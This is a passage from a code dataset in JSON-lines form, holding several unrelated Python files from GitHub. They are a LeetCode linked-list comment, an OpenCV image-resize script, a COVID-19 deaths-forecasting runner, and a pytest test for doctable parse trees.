'''\n1.递归终止条件:节点的next为空,或者只剩下一个元素\n2.返回值:上次交换完成的子链表\n3.因为递归是重复做一样的事情,所以从宏观上考虑,只用考虑某一步是怎么完成的。我们假设待交换的俩节点分别为head和next,\nnext的应该接受上一级返回的子链表(参考第2步)。就相当于是一个含三个节点的链表交换前两个节点,就很简单了,想不明白的画画图就ok\n\n\"\"\"","repo_name":"ANh0r/LeetCode-Daily","sub_path":"10.13 swapPairs.py","file_name":"10.13 swapPairs.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"20386618899","text":"import cv2 as cv\r\nimport sys\r\ndef re_scalling(frame,scale=0.200):\r\n height=int(frame.shape[0]*scale) #height is acessed using the frame.shape[0]\r\n width=int(frame.shape[1]*scale) #width is acessed using the frame.shape[1]\r\n dimensions=(height,width)\r\n return cv.resize(frame,dimensions,interpolation=cv.INTER_AREA)\r\n\r\nt=cv.imread(\"pp.png\")\r\n# cv.imshow(\"org\",t)\r\n# a=re_scalling(t)\r\n\r\nb=cv.resize(t,(200,200)) \r\ncv.imshow(\"resized\",b)\r\ncv.waitKey(0)\r\n\r\n","repo_name":"Ssumeetdubas/Open_cv","sub_path":"rescalling.py","file_name":"rescalling.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36960653225","text":"\"\"\"\nRunning deaths forecasts\nthe same procedure is used is as for cases\nthe main function with trend estimation and forecasting can be found in forecast_one_country.py \n\nto run in cmd on JHU or JHU_US: \npython source/run_deaths_from_cases.py --dataset=\"JHU\" \npython source/run_deaths_from_cases.py --dataset=\"JHU_US\" \n\n\"\"\"\n \nimport multiprocessing\nimport os \nimport time\nimport warnings\nfrom datetime import date\nimport getopt, sys \nimport numpy as np\nimport pandas as pd\n\nfrom covid19dh import covid19 \nsys.path.append('methods_configuration/')\nfrom precomputing import read_countries, repair_increasing\nfrom smoothing import simple_mirroring, piecewise_STL\nfrom function_configuration import METHODS \nfrom visualization import plot_last_forecast \nfrom test_missing_or_zero import test_poisson \nfrom forecast_one_country import compute_confidence, forecast_one_country\n\nif not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\nif not os.path.exists(\"results/\"):\n os.makedirs(\"results/\")\n\n# -------------------------------------------------------------------------------------------------------\n# Get full command-line arguments \n# -------------------------------------------------------------------------------------------------------\n\nfull_cmd_arguments = sys.argv \nshort_options = \"d:\"\nlong_options = [\"dataset=\"]\n# Keep all but the first\nargument_list = full_cmd_arguments[1:] \npath_data = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\"\ndatasource, parse_column = \"JHU\", \"Country/Region\"\n \n \ntry:\n arguments, values = getopt.getopt(argument_list, short_options, long_options)\n for current_argument, current_value in arguments:\n if current_argument in (\"-d\", \"--dataset\"): \n #in case of deaths to change the paths to death data\n if current_value == \"JHU_US\":\n path_data = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_US.csv\"\n datasource, parse_column = \"JHU_US\", \"Province_State\"\n elif current_value == \"JHU\":\n path_data = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv\"\n datasource, parse_column = \"JHU\", \"Country/Region\" \n elif current_value == 'OZH':\n path_data = \"https://raw.githubusercontent.com/openZH/covid_19/master/COVID19_Fallzahlen_CH_total_v2.csv\"\n datasource, parse_column = 'OZH', 'abbreviation_canton_and_fl'\n elif current_value == 'BAG':\n path_data = \"https://www.bag.admin.ch/dam/bag/fr/dokumente/mt/k-und-i/aktuelle-ausbrueche-pandemien/2019-nCoV/covid-19-datengrundlage-lagebericht.xlsx.download.xlsx/200325_base%20de%20donn%C3%A9es_graphiques_COVID-19-rapport.xlsx\"\n datasource, parse_column = 'BAG', 'country'\n elif current_value == 'BAG_KT':\n path_data = \"https://www.covid19.admin.ch/api/data/context\"\n datasource, parse_column = 'BAG_KT', 'geoRegion'\n elif current_value == 'CAN':\n path_data = \"https://api.opencovid.ca/timeseries?stat=mortality&loc=prov\"\n datasource, parse_column = 'CAN', 'province'\n elif current_value == 'HUB':\n path_data = None\n datasource, parse_column = 'HUB', 'id'\n elif current_value == 'PHE':\n path_data = 'https://api.coronavirus.data.gov.uk/v2/data?areaType=nation&metric=cumDeaths28DaysByDeathDate&metric=cumCasesBySpecimenDate&format=csv'\n datasource, parse_column = 'PHE', 'areaName'\n elif current_value == 'SPF_DEP':\n path_data = 'https://www.data.gouv.fr/en/datasets/r/5c4e1452-3850-4b59-b11c-3dd51d7fb8b5'\n datasource, parse_column = 'SPF_DEP', 'dep'\n elif current_value == 'SPF_REG':\n path_data = 'https://www.data.gouv.fr/en/datasets/r/5c4e1452-3850-4b59-b11c-3dd51d7fb8b5'\n datasource, parse_column = 'SPF_REG', 'reg'\n elif current_value == 'SPF_FRA':\n path_data = 'https://www.data.gouv.fr/fr/datasets/r/f335f9ea-86e3-4ffa-9684-93c009d5e617'\n datasource, parse_column = 'SPF_FRA', 'country'\n \nexcept getopt.error as err: \n # Output error, and return with an error code\n print(str(err))\n print(\"using JHU\") \n# -------------------------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n #--------------------setup--------------------\n #default forecast is for H=7 days\n H = 7, \n #smoothing method\n smoothing_fun = piecewise_STL \n print(datasource) \n #-----------------reading the data------------\n if datasource == \"BAG\":\n df = pd.read_excel(path_data, sheet_name=0, skiprows=6)\n df = df.sort_values('Date').iloc[:-1] # exclude the last data point as it is only data before 8am\n df[parse_column] = 'Switzerland' # add country column\n elif datasource == 'BAG_KT':\n df = pd.read_csv(pd.read_json(path_data).loc['individual', 'sources']['csv']['daily']['death'])\n elif datasource == 'CAN':\n df = pd.DataFrame.from_records(pd.read_json(path_data).values.flatten())\n elif datasource == 'HUB':\n df, _ = covid19(level=1, raw=True, verbose=False)\n elif 'SPF' in datasource:\n df = pd.read_csv(path_data, dtype='str', encoding='latin')\n if 'FRA' in datasource:\n df[parse_column] = 'France'\n else:\n df[parse_column] = parse_column + df[parse_column]\n else:\n df = pd.read_csv(path_data)\n \n # ------------------------------------------------------------------------------------------------------- \n #loading the extrapolation method: 3 corresponds to linear extrapolation in original scale when trend \n #is increasing, and in log-scale when decreasing\n #--------------------------------------------------------------------------------------------------------\n subset = [3] \n methods_df_path = \"methods_configuration/selected_methods_const.csv\"\n methods_pd = pd.read_csv(methods_df_path) \n # Read the methods from methods.csv with references given in METHODS \n methods = [METHODS[x] for x in list(methods_pd[\"method\"].values[subset])]\n kwargs_list = [eval(x) for x in list(methods_pd[\"parameters\"].values[subset])]\n names = list(methods_pd[\"description\"].values[subset])\n cv_flag = list(methods_pd[\"cv\"].astype(int).values[subset])\n \n #-------------------------------countries----------------------------------------------------------------\n countries = list(set(df[parse_column])-set([\"Cases_on_an_international_conveyance_Japan\", \"Diamond_Princess\", \"Repatriated\"])) \n cumulative_list, date_list = read_countries(df, countries, 0, datasource, typedata = \"deaths\")\n # -------------------------------forecast deaths--------------------------------------------------------- \n for i in range(len(countries)):\n return_dict, _, ci_ = forecast_one_country({}, countries[i], cumulative_list[i], date_list[i], \n methods, kwargs_list, names, smoothing_fun, datasource, \n H=7, type_data=\"deaths\", missing_var=True, return_val = True, saveplot=False, newly=True) \n if i==0:\n deaths_predictions = return_dict[countries[i]][2].copy()\n ci = ci_.copy() \n else:\n deaths_predictions = deaths_predictions.append(return_dict[countries[i]][2]) \n ci = ci.append(ci_) \n print(countries[i], f\"{i+1}/{len(countries)} done\")\n #----------------------------------------save results----------------------------------------------------- \n deaths_predictions.to_csv(\"results/\"+ datasource +'_deaths_predictions_'+date.today().strftime(\"%Y_%m_%d\")+'.csv')\n \n ci.to_csv(\"results/\"+ datasource +'_deaths_CI_'+date.today().strftime(\"%Y_%m_%d\")+'.csv')\n \n print(f'{datasource} deaths forecasting -- done')\n \n\n \n","repo_name":"ekkrym/CovidTrendModel","sub_path":"source/run_deaths_from_cases.py","file_name":"run_deaths_from_cases.py","file_ext":"py","file_size_in_byte":8243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6022699538","text":"\nimport pytest\n\nimport spacy\n\nimport sys\nsys.path.append('..')\nimport doctable\n\nex_sents = '''\nThis is the best day ever, honestly. \nI am having a ton of fun with you. \nProgramming is awesome!\n'''.replace('\\n','')\n\ndef test_basic():\n nlp = spacy.load('en_core_web_sm', disable=['ner'])\n tmp = doctable.TempFolder('tmp')\n\n # verify operation by pickling/dicting and undicting\n trees = list()\n for sent in nlp(ex_sents).sents:\n \n tree = doctable.ParseTree.from_spacy(sent)\n trees.append(tree)\n print(sent)\n print(tree)\n \n assert(len(tree) == len(sent))\n\n fname = 'test_tree.pic'\n with tmp.path.joinpath(fname).open('wb') as f:\n f.write(tree.as_pickle())\n\n with tmp.path.joinpath(fname).open('rb') as f:\n othertree = doctable.ParseTree.from_pickle(f.read())\n\n assert(repr(tree) == repr(othertree))\n\n # now work with single tree\n tree = trees[0]\n assert(tree.root.text == 'is')\n assert(tree.root.tag == 'VBZ')\n\n # recall that ner was disabled\n with pytest.raises(doctable.textmodels.PropertyNotAvailable):\n tree.root.ent == ''\n \n\nif __name__ == '__main__':\n test_basic()\n \n ","repo_name":"devincornell/doctable","sub_path":"tests/test_parsetrees.py","file_name":"test_parsetrees.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}